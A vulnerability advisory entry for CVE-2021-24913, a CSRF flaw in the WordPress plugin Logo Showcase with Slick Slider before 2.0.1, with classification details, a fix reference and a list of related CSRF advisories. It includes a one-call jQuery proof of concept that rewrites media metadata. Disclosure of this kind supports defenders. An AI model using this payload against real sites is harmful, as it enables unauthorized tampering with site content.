Logo Showcase with Slick Slider < 2.0.1 – Arbitrary Media Title/Description/Alt Text/URL Update via CSRF | CVE 2021-24913 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in the lswss_save_attachment_data AJAX action, allowing attackers to make a logged in high privilege user, change title, description, alt text, and URL of arbitrary uploaded media.

Proof of Concept

jQuery.post(ajaxurl,{
action: "lswss_save_attachment_data",
attachment_id: 564,
form_data: "lswss_attachment_title=Test&lswss_attachment_desc=Changed%20via%20CSRF&lswss_attachment_alt=Alt%20text&lswss_attachment_link="
})

Affects Plugins

logo-showcase-with-slick-slider

Fixed in 2.0.1

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2669404

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

2f499945-1924-49f0-ad6e-9192273a5c05

Timeline

Publicly Published

2022-01-31 (about 2 years ago)

Added

2022-01-31 (about 2 years ago)

Last Updated

2022-04-13 (about 2 years ago)

Other

Published

Title

Published

2023-12-22

Title

Add Any Extension to Pages < 1.5 - Cross-Site Request Forgery via aaetp_options_page

Published

2023-07-17

Title

WP Shopping Pages <= 1.14 - Stored XSS via CSRF

Published

2024-04-18

Title

LetterPress <= 1.2.2 - Subscriber Deletion via CSRF

Published

2023-10-26

Title

Thumbnail Slider With Lightbox < 1.0.1 - Arbitrary File Upload via CSRF

Published

2023-11-21

Title

UserPro < 5.1.2 - Cross-Site Request Forgery via multiple functions